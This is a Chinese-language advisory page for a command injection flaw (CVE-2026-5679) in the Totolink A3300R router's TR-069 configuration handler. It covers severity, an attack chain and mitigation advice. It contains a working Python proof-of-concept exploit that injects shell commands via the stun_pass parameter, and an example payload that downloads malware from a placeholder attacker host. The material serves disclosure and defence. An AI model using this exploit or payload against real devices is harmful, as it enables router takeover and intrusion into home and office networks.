CVE-2026-5679 Totolink A3300R操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5679

漏洞类型

操作系统命令注入

CVSS评分

5.5 中危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink A3300R

漏洞概述

Totolink A3300R路由器17.0.0cu.557_B20221024版本存在操作系统命令注入漏洞。漏洞源于/cgi-bin/cstecgi.cgi文件中vsetTr069Cfg函数对stun_pass参数的处理不当。攻击者通过构造恶意请求，可利用该漏洞在系统上执行任意命令，导致数据泄露或系统被控制。

技术细节

该漏洞的根源在于Totolink A3300R路由器Web管理接口对TR-069相关配置请求的输入验证不足。具体而言，位于/cgi-bin/cstecgi.cgi的vsetTr069Cfg函数在接收stun_pass参数时，未对其内容进行清洗，直接将其传递给了底层的系统调用。攻击者只需具备邻接网络访问权限和低权限认证，即可构造特制的HTTP POST数据包。通过在stun_pass参数中注入Shell元字符（如分号;、管道符|或反引号），攻击者能够闭合原有命令并拼接执行任意恶意指令，从而在服务器端实现未经授权的远程代码执行。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络，识别出运行在17.0.0cu.557_B20221024版本的Totolink A3300R路由器，并确认其开放了Web管理端口（通常为80/443）。

STEP 2

获取访问权限

由于漏洞需要低权限认证（PR:L），攻击者通过暴力破解或获取默认凭证，登录到路由器的Web管理界面获取有效的Session或Cookie。

STEP 3

漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送特制的POST请求，调用vsetTr069Cfg功能，并在stun_pass参数中注入恶意Shell命令（如`; wget http://evil.com/malware`）。

STEP 4

命令执行

后端CGI程序未过滤特殊字符，直接将stun_pass参数拼接到系统命令中执行，导致攻击者的恶意命令在路由器操作系统上运行。

STEP 5

建立控制

攻击者利用执行的命令反弹Shell或下载恶意木马，从而完全控制路由器，进一步窃取网络流量或作为跳板攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL and vulnerable endpoint
url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi"

# Malicious payload to inject OS command (e.g., 'id')
# Using semicolon to separate commands
payload = "; id"

# Construct the POST data
# Function name is usually mapped to topicurl or action in these routers
data = {
    "topicurl": "setTr069Cfg",
    "stun_pass": payload
}

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "uid=<COOKIE_VALUE>" # Requires authentication if PR:L applies
}

try:
    # Send the malicious request
    response = requests.post(url, data=data, headers=headers, timeout=10)
    
    # Check response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink A3300R 17.0.0cu.557_B20221024

防御指南

临时缓解措施

在无法立即升级固件的情况下，建议用户临时关闭路由器的远程Web管理功能，并将管理端口仅限于本地连接。同时，定期检查系统日志中是否存在异常的CGI请求记录，一旦发现可疑的命令执行行为，应立即断开网络并进行排查。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5679
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5679
3 Details https://www.cvedetails.com/cve/CVE-2026-5679/
4 VulDB https://vuldb.com/cve/CVE-2026-5679
5 Link https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injection
6 Link https://vuldb.com/submit/792650
7 Link https://vuldb.com/submit/792798
8 Link https://vuldb.com/vuln/355506
9 Link https://vuldb.com/vuln/355506/cti
10 Link https://www.totolink.net/